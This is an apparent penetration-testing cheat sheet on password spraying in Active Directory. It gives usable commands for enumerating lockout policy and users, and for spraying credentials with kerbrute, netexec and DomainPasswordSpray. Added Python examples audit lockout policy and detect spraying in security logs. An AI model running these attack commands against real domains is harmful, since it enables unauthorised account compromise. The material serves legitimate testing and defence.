# Password Spraying Attack

Try a single password against every user in turn: each account sees only one attempt per round, so the lockout threshold is far less likely to be reached than when brute-forcing one account.

## Password Policy

It is important to obtain the **password policy** first, in particular:

<table data-header-hidden><thead><tr><th width="277"></th><th></th></tr></thead><tbody><tr><td><strong>Lockout threshold</strong></td><td>Number of failed attempts allowed before the account is locked (<code>0</code>/<code>Never</code> means no lockout)</td></tr><tr><td><strong>Lockout duration</strong></td><td>How long the account stays locked</td></tr><tr><td><strong>Lockout observation window</strong></td><td>How long after the last failed attempt the failed-attempt counter resets to zero</td></tr></tbody></table>

### Locally

{% code overflow="wrap" %}

```powershell
# Local policy of this host; add /domain to query the domain policy instead
net accounts
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
# Domain policy; requires the ActiveDirectory module (RSAT)
Get-ADDefaultDomainPasswordPolicy
```

{% endcode %}
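As an added example (not code from the original page), the following Python parses the output of `net accounts` into the fields listed in the table above and turns them into a quick policy review: it flags a disabled lockout, an overly generous threshold or a short observation window, and quantifies the exposure the policy leaves (guesses per account per day that stay under the threshold). The sample output is constructed but follows the real `net accounts` layout; the review limits in `assess_lockout_policy()` are assumptions, not a standard.

```python
"""Parse `net accounts` output and assess the lockout policy it describes.

Added example, not code from the original page. The sample output below is
constructed, but its layout matches what `net accounts` prints on Windows;
the limits used in assess_lockout_policy() are assumptions for illustration.
"""

# Constructed sample of `net accounts` output.
SAMPLE_NET_ACCOUNTS = """\
Force user logoff how long after time expires?:       Never
Minimum password age (days):                          1
Maximum password age (days):                          42
Minimum password length:                              7
Length of password history maintained:                24
Lockout threshold:                                    5
Lockout duration (minutes):                           30
Lockout observation window (minutes):                 30
Computer role:                                        WORKSTATION
The command completed successfully.
"""

# Output labels of interest mapped to short keys.
FIELDS = {
    "Lockout threshold": "lockout_threshold",
    "Lockout duration (minutes)": "lockout_duration",
    "Lockout observation window (minutes)": "observation_window",
    "Minimum password length": "min_length",
}


def parse_net_accounts(text):
    """Return a dict of the policy fields listed in FIELDS.

    Numeric values become ints; "Never" (a threshold of 0, i.e. lockout
    disabled) becomes None. Lines without a known label are ignored.
    """
    policy = {}
    for line in text.splitlines():
        label, sep, value = line.partition(":")
        key = FIELDS.get(label.strip())
        if not sep or key is None:
            continue
        value = value.strip()
        policy[key] = None if value.lower() == "never" else int(value)
    return policy


def exposure_per_day(policy):
    """Guesses per account per day that stay below the lockout threshold.

    The failed-attempt counter resets after the observation window, so
    (threshold - 1) guesses per window never lock an account. Returns None
    when lockout is disabled (exposure is unbounded).
    """
    threshold = policy.get("lockout_threshold")
    window = policy.get("observation_window")
    if threshold is None or not window:
        return None
    return (threshold - 1) * (24 * 60 // window)


def assess_lockout_policy(policy, max_threshold=10, min_window=15):
    """Return a list of findings; an empty list means the policy looks sane.

    max_threshold and min_window are illustrative assumptions.
    """
    findings = []
    threshold = policy.get("lockout_threshold")
    window = policy.get("observation_window")
    if threshold is None:
        findings.append("lockout disabled: unlimited guesses per account")
    elif threshold > max_threshold:
        findings.append(f"lockout threshold {threshold} exceeds {max_threshold}")
    if threshold is not None and window is not None and window < min_window:
        findings.append(f"observation window {window} min resets the counter quickly")
    return findings


if __name__ == "__main__":
    parsed = parse_net_accounts(SAMPLE_NET_ACCOUNTS)
    print(parsed)
    print("exposure per account per day:", exposure_per_day(parsed))
    print("findings:", assess_lockout_policy(parsed) or "none")
```

To review a real host, pipe the command output into `parse_net_accounts()` (for example `net accounts /domain > policy.txt` on a domain-joined machine and read the file). The same three fields come back from `Get-ADDefaultDomainPasswordPolicy` as `LockoutThreshold`, `LockoutDuration` and `LockoutObservationWindow`.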

### Remotely

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> -u &#x3C;USER> -p &#x3C;PASS> --pass-pol</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -u &#x3C;USER> -p &#x3C;PASS> -P &#x3C;IP></code></td></tr></tbody></table>

### Null Session SMB

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> --pass-pol</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -P &#x3C;IP></code></td></tr></tbody></table>

### LDAP Anonymous Binds

<table><thead><tr><th width="150">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://linux.die.net/man/1/ldapsearch">ldapsearch</a></td><td><em>ex. INLANEFREIGHT.LOCAL</em><br><code>ldapsearch -H ldap://&#x3C;IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "*" | grep -m 1 -B 10 pwdHistoryLength</code></td></tr></tbody></table>

## Find Usernames

### Locally

{% code overflow="wrap" %}

```powershell
# Lists the domain's user accounts (queries a domain controller)
net user /domain
```

{% endcode %}

### Remotely

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> -u &#x3C;USER> -p &#x3C;PASS> --users --rid-brute</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -u &#x3C;USER> -p &#x3C;PASS> -U &#x3C;IP></code></td></tr></tbody></table>

### Null Session SMB

<table><thead><tr><th width="161">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td><code>nxc smb &#x3C;IP> --users</code></td></tr><tr><td><a href="https://github.com/cddmp/enum4linux-ng">enum4linux</a></td><td><code>enum4linux -U &#x3C;IP></code></td></tr></tbody></table>

### LDAP Anonymous Binds

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://linux.die.net/man/1/ldapsearch">ldapsearch</a></td><td><em>ex. INLANEFREIGHT.LOCAL</em><br><code>ldapsearch -H ldap://&#x3C;IP> -x -b "DC=INLANEFREIGHT,DC=LOCAL" -s sub "(&#x26;(objectclass=user))" | grep sAMAccountName: | cut -f 2 -d " "</code></td></tr><tr><td><a href="https://github.com/ropnop/windapsearch">windapsearch</a></td><td><code>windapsearch.py --dc-ip &#x3C;IP> -u "" -U</code></td></tr></tbody></table>

### Brute Force

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/ropnop/kerbrute">kerbrute</a></td><td>Uses <a href="https://ldapwiki.com/wiki/Wiki.jsp?page=Kerberos%20Pre-Authentication">Kerberos Pre-Authentication</a> to enumerate users via brute force: the KDC's reply to an AS-REQ reveals whether the principal exists, without a password being tried, so <code>badPwdCount</code> is not incremented (no failed-logon errors and no lockouts).<br><code>kerbrute userenum -d &#x3C;DOMAIN> --dc &#x3C;IP_DC> &#x3C;WORDLIST></code></td></tr></tbody></table>

## Spraying Attack

<table><thead><tr><th width="158">Tool</th><th>Details</th></tr></thead><tbody><tr><td><a href="https://github.com/ropnop/kerbrute">kerbrute</a></td><td>Verifies credentials by requesting a TGT (Kerberos AS-REQ). It is fast and light on the wire: only two UDP frames per attempt (the AS-REQ is sent and the KDC's reply examined). Unlike <code>userenum</code>, every wrong guess counts as a failed logon, so the lockout policy applies.<br><code>kerbrute passwordspray -d &#x3C;DOMAIN> --dc &#x3C;DC_IP> &#x3C;USERS_LIST> &#x3C;PASS></code><br><em>If you receive a network error, make sure the wordlist is ANSI-encoded. You can use Notepad's Save As function to change the encoding.</em></td></tr><tr><td><a href="https://www.netexec.wiki/">netexec</a></td><td>Verifies credentials over SMB (more traffic and slower). Every password listed is tried against every user, so each additional password counts against the lockout threshold.<br><code>nxc smb &#x3C;IP> -u &#x3C;USERS_LIST> -p &#x3C;PASS1> &#x3C;PASS2> -d &#x3C;DOMAIN> --continue-on-success | grep +</code></td></tr><tr><td><a href="https://github.com/dafthack/DomainPasswordSpray">DomainPasswordSpray</a></td><td>Runs from <strong>Windows</strong>. When executed from a domain-joined host it can read the password policy itself (and adapt the spray to it) and enumerate the user list automatically.<br><code>Import-Module .\DomainPasswordSpray.ps1</code><br><code>Invoke-DomainPasswordSpray -Password &#x3C;PASS> -ErrorAction SilentlyContinue [-UserList &#x3C;USERS> -Domain &#x3C;DOMAIN>]</code></td></tr></tbody></table>
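All three tools above share one footprint on the defender's side: a burst of failed logons spread thinly across many accounts from one source, with few attempts per account (the Kerberos path produces Event ID 4771, Kerberos pre-authentication failed, on the domain controller; the SMB path produces Event ID 4625, failed logon, on the target). The following Python, added here as an example and not code from the page or from any of the tools, runs that heuristic over constructed security events: a source is flagged when its failures hit at least `min_accounts` distinct accounts within a sliding time window. The event tuples, addresses and user names are constructed, and the window and account thresholds are assumptions to tune per environment.

```python
"""Flag password-spray behaviour in Windows security events.

Added example, not code from the original page. The events below are
constructed; each is (timestamp, event_id, source_ip, target_user), the
fields a SIEM carries for 4625 (failed logon) and 4771 (Kerberos
pre-authentication failed). Window and account thresholds are assumptions.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events.
EVENTS = [
    # 10.0.0.55: one password tried against six accounts in under two minutes
    ("2024-05-01T09:00:01", 4771, "10.0.0.55", "alice"),
    ("2024-05-01T09:00:09", 4771, "10.0.0.55", "bob"),
    ("2024-05-01T09:00:17", 4771, "10.0.0.55", "carol"),
    ("2024-05-01T09:00:26", 4771, "10.0.0.55", "dave"),
    ("2024-05-01T09:00:34", 4771, "10.0.0.55", "erin"),
    ("2024-05-01T09:01:42", 4771, "10.0.0.55", "frank"),
    # a successful logon (4624) from the same source is not a failure
    ("2024-05-01T09:02:00", 4624, "10.0.0.55", "frank"),
    # 10.0.0.99: one user mistyping a password twice (normal noise)
    ("2024-05-01T09:30:00", 4625, "10.0.0.99", "carol"),
    ("2024-05-01T09:31:10", 4625, "10.0.0.99", "carol"),
    # 10.0.0.77: five accounts, but spread over two hours
    ("2024-05-01T10:00:00", 4625, "10.0.0.77", "alice"),
    ("2024-05-01T10:30:00", 4625, "10.0.0.77", "bob"),
    ("2024-05-01T11:00:00", 4625, "10.0.0.77", "carol"),
    ("2024-05-01T11:30:00", 4625, "10.0.0.77", "dave"),
    ("2024-05-01T12:00:00", 4625, "10.0.0.77", "erin"),
]

# Failed-logon event IDs that a spray produces (SMB/NTLM path and Kerberos path).
FAILURE_EVENT_IDS = {4625, 4771}


def find_spray_sources(events, window_minutes=10, min_accounts=5):
    """Return {source_ip: {"accounts": n, "attempts": m}} for every source
    whose failures hit at least min_accounts distinct accounts within any
    window_minutes-long sliding window. Non-failure events are ignored."""
    window = timedelta(minutes=window_minutes)
    by_src = defaultdict(list)
    for ts, event_id, src, user in events:
        if event_id in FAILURE_EVENT_IDS:
            by_src[src].append((datetime.fromisoformat(ts), user))

    flagged = {}
    for src, attempts in by_src.items():
        attempts.sort()  # oldest first; the window slides over this list
        start = 0
        for end, (t_end, _) in enumerate(attempts):
            # drop attempts older than the window relative to the newest one
            while t_end - attempts[start][0] > window:
                start += 1
            distinct = {u for _, u in attempts[start:end + 1]}
            if len(distinct) >= min_accounts:
                flagged[src] = {
                    "accounts": len({u for _, u in attempts}),
                    "attempts": len(attempts),
                }
                break  # one hit is enough to report the source
    return flagged


if __name__ == "__main__":
    for src, summary in find_spray_sources(EVENTS).items():
        print(f"{src}: {summary['attempts']} failures across "
              f"{summary['accounts']} accounts -> possible password spray")
```

The ratio of attempts to accounts is what separates a spray (close to 1) from a brute force against a single account (many attempts, one account), which is why `10.0.0.99` is never flagged however the window is tuned. Widening the window catches a slow spray such as `10.0.0.77`, at the cost of more noise; in practice the window is set from the lockout observation window obtained in the policy section, since an attacker avoiding lockouts has to space rounds at least that far apart.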
